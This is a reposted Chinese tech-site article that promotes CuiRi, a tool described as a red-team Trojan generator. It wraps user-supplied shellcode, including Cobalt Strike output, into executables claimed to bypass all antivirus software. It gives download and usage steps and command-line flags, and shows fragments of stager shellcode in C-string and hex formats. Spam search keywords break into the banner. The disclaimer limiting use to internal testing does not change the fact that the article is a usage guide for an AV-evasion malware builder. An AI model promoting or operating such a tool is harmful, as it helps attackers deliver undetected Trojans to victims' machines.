加入收藏 | 设为首页 | 会员中心 | 我要投稿 92站长网 (https://www.92zz.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 服务器 > 安全 > 正文

摧日:CuiRi 红队专用免杀木马生成工具

发布时间:2022-12-19 15:09:00 所属栏目:安全 来源:转载
导读:
0x01 简介:
____ __ __ _____ ______ _____
/ ___) ) ) ( ( (_ _) ( __ \ (_ _)
/ / ( ( ) ) | | ) (__) ) | |
( ( )

-w1325

0x01 简介:

____   __    __    _____      ______      _____
  / ___)  ) )  ( (   (_   _)    (   __ \    (_   _) 
 / /     ( (    ) )    | |       ) (__) )     | |
( (       ) )  ( (     | |      (    __/      | |
( (      ( (    ) )    | |       ) \ \  _     | |
 \ \___   ) \__/ (    _| |__    ( ( \ \_))   _| |__ 
  \____)  \______/   /_____(     )_) \__/   /_____( 
摧日:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马

CuiRi 是一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。

特点

感谢 go-strip 作者 @boy-hack

0x02 使用:

从 release中下载二进制文件,并且在系统上安装 Go 语言环境,然后将 shellcode 保存到1个txt文件中,即可使用本工具生成免杀马。

____   __    __    _____      ______      _____
  / ___)  ) )  ( (   (_   _)    (   __ \    (_   _)
 / /     ( (    ) )    | |       ) (__) )     | |
( (       ) )  ( (     | |      (    __/      | |
( (      ( (    ) )    | |       ) \ \  _     | |

木马免杀工具_免杀一句话木马_如何让木马免杀

 \ \___   ) \__/ (    _| |__    ( ( \ \_))   _| |__
  \____)  \______/   /_____(     )_) \__/   /_____(
摧日:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马
警告:
1.本工具仅用于企业内部测试,请勿用于任何非法犯罪活动,否则后果自负
2.本工具需要Go语言环境,且使用时需要关闭杀软
https://github.com/NyDubh3/CuiRi   Author:Dubh3
[INFO] Current Version: 1.0
Usage of CuiRi.exe:
  -f string
        通过shellcode生成免杀马
  -manual
        查看shellcode生成方法

CuiRi 支持的 shellcode 格式分为以下两种:

1.C语言字符串格式 shellcode:

"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48"

"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"

2.纯十六进制数值格式 shellcode:

注意:如果是从 Cobalt Strike 中生成的 bin 文件木马免杀工具,请单独将 bin 里的十六进制复制保存到一个 txt 文件中。

fce8 8900 0000 6089 e531 d264 8b52 308b
520c 8b52 148b 7228 0fb7 4a26 31ff 31c0
ac3c 617c 022c 20c1 cf0d 01c7 e2f0 5257
8b52 108b 423c 01d0 8b40 7885 c074 4a01
d050 8b48 188b 5620 01d3 e33c 498b 348b
01d6 31ff 31c0 acc1 cf0d 01c7 38e0 75f4
037d f83b 7d24 75e2 588b 5624 01d3 668b

0x03 演示:

(1) 生成 shellcode

-w1325

(2) 生成免杀马

-w1325

(3) 免杀效果

-w1325

-w1325

(编辑:92站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
    相关内容
      推荐文章
      站长推荐
      热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2017-2022 https://www.92zz.com.cn/ All Rights Reserved. 92站长网